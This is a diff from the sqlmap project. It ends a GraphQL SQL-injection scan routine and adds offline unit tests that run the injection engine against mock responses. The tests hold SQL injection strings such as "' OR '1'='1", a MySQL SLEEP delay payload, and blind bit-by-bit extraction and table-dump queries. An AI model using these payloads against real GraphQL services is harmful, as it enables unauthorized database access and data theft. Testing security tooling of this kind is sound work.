warnMsg += "(%s). They may carry the same injection. Test them manually if intended" % ", ".join(names) + logger.warning(warnMsg) + + # 5. Per-slot detection; keep the first usable blind-SQLi oracle for enumeration + oracle = None + found = False + + for slot in querySlots: + logger.info("testing slot %s.%s(%s:) [%s]" % ( + slot.parentType, slot.fieldName, slot.targetArg, slot.strategy)) + + oracleType, slotOracle, _ = _testSlot(slot, endpoint) + if oracleType: + found = True + if slotOracle and not oracle: + oracle = slotOracle + logger.info("retaining %s.%s(%s:) as the blind-SQLi oracle for back-end enumeration" % ( + slot.parentType, slot.fieldName, slot.targetArg)) + + # 6. Back-end enumeration through the retained oracle + if oracle: + _enumerate(oracle) + + if not found: + logger.warning("no injectable slots found. The schema is shown above") + + logger.info("GraphQL scan complete") diff --git a/tests/test_graphql.py b/tests/test_graphql.py new file mode 100644 index 000000000..64a76e930 --- /dev/null +++ b/tests/test_graphql.py @@ -0,0 +1,680 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +Offline, deterministic tests for the GraphQL injection engine. Mock oracles stand in for the +HTTP/GraphQL layer so endpoint detection, introspection parsing, slot enumeration, query +construction, and boolean/error-based detection can be exercised without a live target. +""" + +import json +import re +import unittest + +from _testutils import bootstrap +bootstrap() + +import lib.techniques.graphql.inject as gi + +# --- Mock helpers ----------------------------------------------------------- + +MATCH = '{"data":{"user":{"id":1,"name":"luther","surname":"blisset"}}}' +NOMATCH = '{"data":{"user":null}}' +DB_ERROR = '{"errors":[{"message":"You have an error in your SQL syntax; check the manual...","path":["user"]}]}' +GQL_PARSE_ERROR = '{"errors":[{"message":"Syntax Error: Expected Name, found )","extensions":{"code":"GRAPHQL_PARSE_FAILED"}}]}' + +MOCK_SCHEMA = { + "data": {"__schema": { + "queryType": {"name": "Query"}, + "mutationType": {"name": "Mutation"}, + "subscriptionType": None, + "directives": [], + "types": [ + {"kind": "OBJECT", "name": "Query", "fields": [ + {"name": "user", "args": [ + {"name": "username", "defaultValue": None, + "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}} + ], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + {"name": "byId", "args": [ + {"name": "id", "defaultValue": None, + "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}} + ], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + {"name": "login", "args": [ + {"name": "username", "defaultValue": None, + "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}, + {"name": "password", "defaultValue": None, + "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}, + ], "type": {"kind": "OBJECT", "name": "AuthPayload", "ofType": None}}, + {"name": "version", "args": [], + "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + {"kind": "SCALAR", "name": "String"}, + {"kind": "SCALAR", "name": "Int"}, + {"kind": "SCALAR", "name": "Float"}, + {"kind": "SCALAR", "name": "ID"}, + {"kind": "OBJECT", "name": "User", "fields": [ + {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "Int", "ofType": None}}, + {"name": "name", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + {"kind": "OBJECT", "name": "AuthPayload", "fields": [ + {"name": "token", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + {"name": "user", "args": [], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + ] + }} +} + + +def _slot(opType, rootName, fieldName, argName, strategy="string", + returnKind="OBJECT", returnType="User", + returnSel="{ id name }", allArgs=None): + """Test helper: build a minimal Slot with sensible defaults""" + if allArgs is None: + argType = {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}} + if strategy == "numeric": + argType = {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}} + elif strategy == "id_dual": + argType = {"kind": "SCALAR", "name": "ID"} + allArgs = [(argName, argType, None)] + return gi.Slot(opType, rootName, fieldName, allArgs, argName, strategy, + returnKind, returnType, returnSel) + + +# --- Tests ----------------------------------------------------------------- + +class TestGraphqlHelpers(unittest.TestCase): + """Unit tests for type-walking, classification, and response parsing""" + + def test_unwrap_simple_scalar(self): + chain = gi._unwrapType({"kind": "SCALAR", "name": "String"}) + self.assertEqual(chain, [("SCALAR", "String")]) + + def test_unwrap_non_null(self): + chain = gi._unwrapType({"kind": "NON_NULL", "name": None, + "ofType": {"kind": "SCALAR", "name": "String"}}) + self.assertEqual(chain, [("NON_NULL", None), ("SCALAR", "String")]) + + def test_unwrap_list_non_null(self): + chain = gi._unwrapType({"kind": "LIST", "name": None, + "ofType": {"kind": "NON_NULL", "name": None, + "ofType": {"kind": "OBJECT", "name": "User"}}}) + self.assertEqual(chain, [("LIST", None), ("NON_NULL", None), ("OBJECT", "User")]) + + def test_classify_string(self): + self.assertEqual(gi._classifyArg({"kind": "NON_NULL", "ofType": {"kind": "SCALAR", "name": "String"}}), "string") + + def test_classify_int(self): + self.assertEqual(gi._classifyArg({"kind": "SCALAR", "name": "Int"}), "numeric") + + def test_classify_float(self): + self.assertEqual(gi._classifyArg({"kind": "SCALAR", "name": "Float"}), "numeric") + + def test_classify_id(self): + self.assertEqual(gi._classifyArg({"kind": "SCALAR", "name": "ID"}), "id_dual") + + def test_classify_boolean_is_none(self): + self.assertIsNone(gi._classifyArg({"kind": "SCALAR", "name": "Boolean"})) + + def test_escape_graphql_string(self): + self.assertEqual(gi._escapeGraphQLString('test"quote'), 'test\\"quote') + self.assertEqual(gi._escapeGraphQLString("back\\slash"), "back\\\\slash") + + def test_is_graphql_response_with_typename(self): + self.assertTrue(gi._isGraphQLResponse('{"data":{"__typename":"Query"}}')) + + def test_is_graphql_response_parse_error(self): + self.assertTrue(gi._isGraphQLResponse( + '{"errors":[{"message":"Syntax Error: Unexpected ","extensions":{"code":"GRAPHQL_PARSE_FAILED"}}]}')) + + def test_not_graphql_response(self): + self.assertFalse(gi._isGraphQLResponse("hello")) + self.assertFalse(gi._isGraphQLResponse("")) + self.assertFalse(gi._isGraphQLResponse('{"data":{"user":{"id":1}}}')) # no __typename, no graphql error phrasing + + def test_error_text_extraction(self): + err = gi._errorText(DB_ERROR) + self.assertIn("SQL syntax", err) + self.assertIn("check the manual", err) + + def test_error_text_from_parse_failure(self): + err = gi._errorText(GQL_PARSE_ERROR) + self.assertIn("GRAPHQL_PARSE_FAILED", err) + self.assertIn("Syntax Error", err) + + def test_slot_value_from_data(self): + val = gi._slotValue(MATCH) + self.assertIn("luther", val) + self.assertIn("blisset", val) + + def test_slot_value_null(self): + val = gi._slotValue(NOMATCH) + self.assertIn("null", val) + + +class TestGraphqlIntrospection(unittest.TestCase): + """Schema walking and slot enumeration""" + + def test_extract_slots(self): + schema = MOCK_SCHEMA["data"]["__schema"] + slots = gi._extractSlots(schema) + names = [(s.parentType, s.fieldName, s.targetArg, s.strategy) for s in slots] + self.assertIn(("Query", "user", "username", "string"), names) + self.assertIn(("Query", "byId", "id", "numeric"), names) + + def test_login_has_two_args(self): + """login(username: String!, password: String!) -- both required args should be in Slot""" + schema = MOCK_SCHEMA["data"]["__schema"] + slots = gi._extractSlots(schema) + loginSlots = [s for s in slots if s.fieldName == "login"] + self.assertEqual(len(loginSlots), 2) + for s in loginSlots: + self.assertEqual(len(s.allArgs), 2) # username + password + + def test_scalar_return_has_empty_selection(self): + """version: String -- field with no args produces no slots""" + schema = MOCK_SCHEMA["data"]["__schema"] + slots = gi._extractSlots(schema) + # version has no args, so it should NOT appear in slots + versionSlots = [s for s in slots if s.fieldName == "version"] + self.assertEqual(len(versionSlots), 0) + + +class TestGraphqlBuildQuery(unittest.TestCase): + """GraphQL query document construction from Slot + value""" + + def test_string_arg(self): + slot = _slot("query", "Query", "user", "username", "string") + q = gi._buildQuery(slot, "luther") + self.assertIn('user(username:"luther")', q) + self.assertIn("{ id name }", q) + + def test_string_injection_payload(self): + slot = _slot("query", "Query", "user", "username", "string") + q = gi._buildQuery(slot, "' OR '1'='1") + self.assertIn("' OR '1'='1", q) + + def test_numeric_with_payload_is_empty(self): + """Numeric GraphQL literals cannot carry SQL payloads; _buildQuery returns ''""" + slot = _slot("query", "Query", "byId", "id", "numeric") + q = gi._buildQuery(slot, "1 OR 1=1") + self.assertEqual(q, "") + + def test_numeric_with_valid_integer(self): + slot = _slot("query", "Query", "byId", "id", "numeric") + q = gi._buildQuery(slot, "1") + self.assertIn("byId(id:1)", q) + + def test_id_string(self): + slot = _slot("query", "Query", "get", "uid", "id_dual") + q = gi._buildQuery(slot, "abc") + self.assertIn('get(uid:"abc")', q) + + def test_id_numeric(self): + slot = _slot("query", "Query", "get", "uid", "id_dual") + q = gi._buildQuery(slot, "123") + self.assertIn("get(uid:123)", q) + + def test_two_required_args_renders_both(self): + """login(username: String!, password: String!) -- uninjected sibling gets a default""" + allArgs = [ + ("username", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}, None), + ("password", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}, None), + ] + slot = gi.Slot("query", "Query", "login", allArgs, "password", "string", + "OBJECT", "AuthPayload", "{ token user { id name } }") + q = gi._buildQuery(slot, "' OR '1'='1") + self.assertIn("login(", q) + self.assertIn("username:", q) # required sibling rendered + self.assertIn("password:", q) # target arg rendered + self.assertIn("' OR '1'='1", q) + + def test_mutation_wraps_with_mutation_keyword(self): + allArgs = [ + ("id", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}, None), + ("email", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}, None), + ] + slot = gi.Slot("mutation", "Mutation", "updateUser", allArgs, "email", "string", + "OBJECT", "User", "{ id name }") + q = gi._buildQuery(slot, "x' OR '1'='1") + self.assertTrue(q.startswith("mutation {")) + + +class TestGraphqlBooleanDetection(unittest.TestCase): + """Boolean-based detection via mock oracle""" + + def setUp(self): + self._gql = gi._gqlSend + gi.conf = type("C", (), {"url": "http://test/graphql"})() + + pages = {"true": MATCH, "false": NOMATCH} + def fakeSend(endpoint, query, variables=None): + if "'1'='1" in query: + return pages["true"], 200 + if "'1'='2" in query: + return pages["false"], 200 + return NOMATCH, 200 + gi._gqlSend = fakeSend + + def tearDown(self): + gi._gqlSend = self._gql + + def test_boolean_detected(self): + slot = _slot("query", "Query", "user", "username", "string") + oracleType, template = gi._detectBoolean(slot, "http://test/graphql") + self.assertIsNotNone(oracleType) + self.assertIn("boolean-based", oracleType) + + def test_numeric_skipped(self): + slot = _slot("query", "Query", "byId", "id", "numeric") + oracleType, template = gi._detectBoolean(slot, "http://test/graphql") + self.assertIsNone(oracleType) + + +class TestGraphqlErrorDetection(unittest.TestCase): + """Error-based detection via mock oracle""" + + def setUp(self): + self._gql = gi._gqlSend + gi.conf = type("C", (), {"url": "http://test/graphql"})() + + def fakeSend(endpoint, query, variables=None): + if "'" in query and "'1'='1" not in query: + return DB_ERROR, 500 + return NOMATCH, 200 + gi._gqlSend = fakeSend + + def tearDown(self): + gi._gqlSend = self._gql + + def test_error_detected(self): + slot = _slot("query", "Query", "user", "username", "string") + oracleType, detail = gi._detectError(slot, "http://test/graphql") + self.assertEqual(oracleType, "error-based") + + +class TestGraphqlParseRows(unittest.TestCase): + """JSON data row parsing for in-band dumps""" + + def test_single_object(self): + page = '{"data":{"user":{"id":1,"name":"luther","surname":"blisset"}}}' + slot = _slot("query", "Query", "user", "username", "string") + result = gi._parseRows(page, slot) + self.assertIsNotNone(result) + columns, rows = result + self.assertIn("id", columns) + self.assertIn("name", columns) + self.assertEqual(rows[0][columns.index("name")], "luther") + + def test_list_of_objects(self): + page = '{"data":{"search":[{"id":1,"name":"luther"},{"id":2,"name":"fluffy"}]}}' + slot = _slot("query", "Query", "search", "term", "string") + columns, rows = gi._parseRows(page, slot) + self.assertEqual(len(rows), 2) + names = [r[columns.index("name")] for r in rows] + self.assertIn("luther", names) + self.assertIn("fluffy", names) + + def test_null_returns_none(self): + page = '{"data":{"user":null}}' + slot = _slot("query", "Query", "user", "username", "string") + self.assertIsNone(gi._parseRows(page, slot)) + + def test_non_json_returns_none(self): + self.assertIsNone(gi._parseRows("", None)) + + +class TestGraphqlGrid(unittest.TestCase): + """ASCII table rendering""" + + def test_grid(self): + output = gi._grid(["id", "name"], [["1", "luther"], ["2", "fluffy"]]) + self.assertIn("id", output) + self.assertIn("luther", output) + self.assertIn("fluffy", output) + self.assertIn("+-", output) + self.assertIn("|", output) + + +class TestGraphqlEndpointDetection(unittest.TestCase): + """Mock endpoint detection""" + + def setUp(self): + self._gql = gi._gqlSend + def fakeSend(endpoint, query, variables=None): + if endpoint.endswith("/graphql") and "__typename" in query: + return '{"data":{"__typename":"Query"}}', 200 + return 'Not Found', 404 + gi._gqlSend = fakeSend + + def tearDown(self): + gi._gqlSend = self._gql + + def test_detect_direct_url(self): + endpoint, page = gi._detectEndpoint("http://test/graphql", probePaths=False) + self.assertEqual(endpoint, "http://test/graphql") + + def test_detect_via_probe(self): + endpoint, page = gi._detectEndpoint("http://test", probePaths=True) + self.assertEqual(endpoint, "http://test/graphql") + + def test_not_graphql_endpoint(self): + def fakeSend(endpoint, query, variables=None): + return 'Not Found', 404 + gi._gqlSend = fakeSend + endpoint, page = gi._detectEndpoint("http://test", probePaths=True) + self.assertIsNone(endpoint) + + +class TestGraphqlIntrospectionFallback(unittest.TestCase): + """Introspection without specifiedByURL (older servers)""" + + def setUp(self): + self._gql = gi._gqlSend + gi.conf = type("C", (), {"url": "http://test/graphql"})() + + def tearDown(self): + gi._gqlSend = self._gql + + def test_fallback_without_specifiedByURL(self): + calls = [] + def fakeSend(endpoint, query, variables=None): + calls.append(query) + if "specifiedByURL" in query: + return '{"errors":[{"message":"Unknown field specifiedByURL"}]}', 400 + return json.dumps(MOCK_SCHEMA), 200 + + gi._gqlSend = fakeSend + schema = gi._introspect("http://test/graphql") + self.assertIsNotNone(schema) + self.assertIn("queryType", schema) + self.assertEqual(len(calls), 2) # first fails, second succeeds + + +class TestGraphqlNestedReturnSelection(unittest.TestCase): + """Nested return selections for object-typed fields within the return type""" + + def test_auth_payload_nested_user(self): + """AuthPayload { token, user { id name } } -- selection must nest user sub-fields""" + schema = MOCK_SCHEMA["data"]["__schema"] + slots = gi._extractSlots(schema) + loginSlots = [s for s in slots if s.fieldName == "login"] + self.assertTrue(len(loginSlots) > 0) + # The nested selection should include 'user { ... }' at some level + for s in loginSlots: + self.assertIn("token", s.returnSel) + # user sub-fields should appear + self.assertIn("id", s.returnSel) + self.assertIn("name", s.returnSel) + + +class TestGraphqlCell(unittest.TestCase): + """Dump-cell rendering: scalars as text, nested structures as compact JSON, null as NULL""" + + def test_scalar(self): + self.assertEqual(gi._cell("luther"), "luther") + self.assertEqual(gi._cell(7), "7") + + def test_null(self): + self.assertEqual(gi._cell(None), "NULL") + + def test_nested_object_is_json_not_repr(self): + # issue B: a nested object must not leak Python dict syntax into the dump + self.assertEqual(gi._cell({"id": 1, "name": "luther"}), '{"id": 1, "name": "luther"}') + self.assertEqual(gi._cell([1, 2]), "[1, 2]") + + +class TestGraphqlDialects(unittest.TestCase): + """Per-DBMS SQL building blocks""" + + def test_sqlite_ordinal_and_length(self): + d = gi.DIALECTS["SQLite"] + self.assertEqual(d.length("x"), "LENGTH((x))") + self.assertEqual(d.ordinal("x", 3), "UNICODE(SUBSTR((x),3,1))") + + def test_sqlite_rows_handles_nulls(self): + d = gi.DIALECTS["SQLite"] + sql = d.rows(["name", "surname"], "users") + self.assertIn("GROUP_CONCAT", sql) + self.assertIn("COALESCE(CAST(name AS TEXT),'NULL')", sql) + self.assertIn("FROM users", sql) + + def test_mysql_uses_sleep_delay(self): + d = gi.DIALECTS["MySQL"] + self.assertEqual(d.delay("1=1", 5), "IF((1=1),SLEEP(5),0)") + + def test_sqlite_has_no_delay(self): + self.assertIsNone(gi.DIALECTS["SQLite"].delay) + + +class TestGraphqlFingerprint(unittest.TestCase): + """DBMS fingerprinting drives off the universal truth() predicate""" + + def test_identifies_sqlite(self): + truth = lambda cond: cond == gi.DIALECTS["SQLite"].fingerprint + self.assertEqual(gi._fingerprint(truth), "SQLite") + + def test_identifies_mysql(self): + truth = lambda cond: cond == gi.DIALECTS["MySQL"].fingerprint + self.assertEqual(gi._fingerprint(truth), "MySQL") + + def test_unknown_backend(self): + self.assertIsNone(gi._fingerprint(lambda cond: False)) + + +def _mockOracle(target): + """A synthetic SQLite-like dialect plus truth/truthBatch closures that answer comparison and bit + predicates against a known `target` string - lets the blind extractors be exercised without HTTP.""" + + dialect = gi.Dialect( + fingerprint="FP", delay=None, banner=None, currentUser=None, currentDb=None, + tables=None, columns=None, + length=lambda expr: "LEN(%s)" % expr, + ordinal=lambda expr, pos: "ORD(%s,%d)" % (expr, pos), + rows=None) + + def _value(cond): + pos = None + if cond.startswith("LEN("): + value = len(target) + else: # ORD(,) + pos = int(cond[cond.index(",") + 1:cond.rindex(")")]) + value = ord(target[pos - 1]) if pos - 1 < len(target) else 0 + return value + + def truth(cond): + tail = cond[cond.rindex(")") + 1:] # e.g. ">=65" + op = re.match(r"(>=|>|=)", tail).group(1) + num = int(tail[len(op):]) + value = _value(cond) + return {">": value > num, ">=": value >= num, "=": value == num}[op] + + def truthBatch(conditions): + results = [] + for cond in conditions: + bit = re.match(r"\(ORD\(.*?,(\d+)\) & (\d+)\)>0$", cond) + if bit: + pos, mask = int(bit.group(1)), int(bit.group(2)) + value = ord(target[pos - 1]) if pos - 1 < len(target) else 0 + results.append((value & mask) > 0) + else: + results.append(truth(cond)) + return results + + return dialect, truth, truthBatch + + +class TestGraphqlInference(unittest.TestCase): + """Blind value recovery: sequential bisection and bit-parallel batched extraction""" + + def test_sequential_extraction(self): + for target in ("3.45.1", "users,creds", "db3a16990a0008a3b04707fdef6584a0", ""): + dialect, truth, _ = _mockOracle(target) + self.assertEqual(gi._inferExpr(truth, dialect, "EXPR"), target) + + def test_batched_extraction_matches_sequential(self): + for target in ("3.45.1", "users,creds", "luther~~~blisset^^^fluffy~~~bunny"): + dialect, _, truthBatch = _mockOracle(target) + self.assertEqual(gi._inferExprBatched(truthBatch, dialect, "EXPR"), target) + + def test_batched_empty(self): + dialect, _, truthBatch = _mockOracle("") + self.assertEqual(gi._inferExprBatched(truthBatch, dialect, "EXPR"), "") + + +class TestGraphqlDumpTable(unittest.TestCase): + """Whole-table dump: column list + row scalar split back into a grid""" + + def test_dump_table(self): + responses = { + "(SELECT GROUP_CONCAT(name) FROM pragma_table_info('users'))": "id,name", + } + rowScalar = "1%snull^^^2%sluther" % ("~~~", "~~~") # two rows, two columns + + def infer(expr, maxLen=gi.MAX_LENGTH): + if expr in responses: + return responses[expr] + return rowScalar # the GROUP_CONCAT row dump + + columns, rows = gi._dumpTable(infer, gi.DIALECTS["SQLite"], "users") + self.assertEqual(columns, ["id", "name"]) + self.assertEqual(rows, [["1", "null"], ["2", "luther"]]) + + +class TestGraphqlMakeOracle(unittest.TestCase): + """Universal truth()/truthBatch() primitive built from a slot's true/false contrast""" + + USER_OBJ = {"id": 1, "name": "luther", "surname": "blisset"} + + def setUp(self): + self._gql = gi._gqlSend + + def fakeSend(endpoint, query, variables=None): + if "a0:" in query: # batched, aliased request + data = {} + for m in re.finditer(r'(a\d+):\w+\(\w+:"[^"]*\((1=1|1=2)\)', query): + data[m.group(1)] = self.USER_OBJ if m.group(2) == "1=1" else None + return json.dumps({"data": data}), 200 + if "(1=1)" in query: + return json.dumps({"data": {"user": self.USER_OBJ}}), 200 + return json.dumps({"data": {"user": None}}), 200 + + gi._gqlSend = fakeSend + + def tearDown(self): + gi._gqlSend = self._gql + + def test_truth_primitive(self): + slot = _slot("query", "Query", "user", "username", "string") + truth, truthBatch = gi._makeOracle(slot, "http://test/graphql") + self.assertIsNotNone(truth) + self.assertTrue(truth("1=1")) + self.assertFalse(truth("1=2")) + + def test_batched_truth(self): + slot = _slot("query", "Query", "user", "username", "string") + _, truthBatch = gi._makeOracle(slot, "http://test/graphql") + self.assertEqual(truthBatch(["1=1", "1=2", "1=1"]), [True, False, True]) + + +class TestVulnserverGraphqlParser(unittest.TestCase): + """The vulnserver's selection parser must survive aliased batches and bracketed payloads""" + + def setUp(self): + from extra.vulnserver import vulnserver + self.vs = vulnserver + + def test_match_skips_quoted_brackets(self): + text = 'user(username:"x\' OR (1=1)-- "){ id }' + end = self.vs._graphql_match(text, text.index("(")) + self.assertEqual(text[end - 1], ")") # the args close-paren, not one inside the string + + def test_single_field(self): + sels = self.vs._graphql_selections('user(username:"luther"){ id name }') + self.assertEqual(sels, [(None, "user", 'username:"luther"')]) + + def test_aliased_batch_with_payloads(self): + body = 'a0:user(username:"x\' OR (1=1)-- "){ id } a1:user(username:"x\' OR (1=2)-- "){ id }' + sels = self.vs._graphql_selections(body) + self.assertEqual([(a, f) for a, f, _ in sels], [("a0", "user"), ("a1", "user")]) + self.assertIn("(1=1)", sels[0][2]) + self.assertIn("(1=2)", sels[1][2]) + + def test_nested_selection_set(self): + sels = self.vs._graphql_selections('login(username:"a", password:"b"){ token user { id name } }') + self.assertEqual(len(sels), 1) + self.assertEqual(sels[0][1], "login") + + +class TestGraphqlSiblingDefaults(unittest.TestCase): + """Required sibling arguments must use their real type, not be hardcoded as strings""" + + def test_numeric_sibling_not_quoted(self): + """field(name: String!, limit: Int!) -- injecting 'name' renders limit:0, not limit:\"0\"""" + allArgs = [ + ("name", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}, None), + ("limit", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}, None), + ] + slot = gi.Slot("query", "Query", "search", allArgs, "name", "string", + "OBJECT", "User", "{ id }") + q = gi._buildQuery(slot, "' OR '1'='1") + self.assertIn("limit:0", q) + self.assertNotIn('limit:"0"', q) + + def test_boolean_sibling_gets_default_string(self): + """field(name: String!, active: Boolean!) -- Boolean gets \"x\" since there is no Boolean strategy""" + allArgs = [ + ("name", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}, None), + ("active", {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}, None), + ] + slot = gi.Slot("query", "Query", "toggle", allArgs, "name", "string", + "OBJECT", "User", "{ id }") + q = gi._buildQuery(slot, "test") + self.assertIn('active:"x"', q) + + +class TestGraphqlScalarReturnSelection(unittest.TestCase): + """Scalar and list-of-scalar returns must not get a spurious {__typename} selection""" + + def test_scalar_return_has_no_selection(self): + """version(format: String): String -- no sub-selection""" + allArgs = [ + ("format", {"kind": "SCALAR", "name": "String"}, None), + ] + slot = gi.Slot("query", "Query", "version", allArgs, "format", "string", + "SCALAR", "String", None) + q = gi._buildQuery(slot, "json") + self.assertIn('version(format:"json")', q) + self.assertNotIn("{", q.split(")")[1] if ")" in q else q) + + def test_list_of_scalars_has_no_selection(self): + """tags(prefix: String): [String] -- no sub-selection""" + allArgs = [ + ("prefix", {"kind": "SCALAR", "name": "String"}, None), + ] + slot = gi.Slot("query", "Query", "tags", allArgs, "prefix", "string", + "SCALAR", "String", None) + q = gi._buildQuery(slot, "a") + self.assertIn('tags(prefix:"a")', q) + self.assertNotIn("{", q.split(")")[1] if ")" in q else q) + + +class TestGraphqlUnicodeSafety(unittest.TestCase): + """All string conversions must be safe under Python 2 and 3 for non-ASCII data""" + + def test_escape_graphql_string_unicode(self): + escaped = gi._escapeGraphQLString(u"caf\xe9") + self.assertIn("caf", escaped) + + def test_error_text_unicode(self): + page = u'{"errors":[{"message":"caf\xe9","extensions":{"code":"SYNTAX_ERROR"}}]}' + text = gi._errorText(page) + self.assertIn("caf", text) + + def test_cell_unicode(self): + self.assertIn("caf", gi._cell(u"caf\xe9")) + + +if __name__ == "__main__": + unittest.main()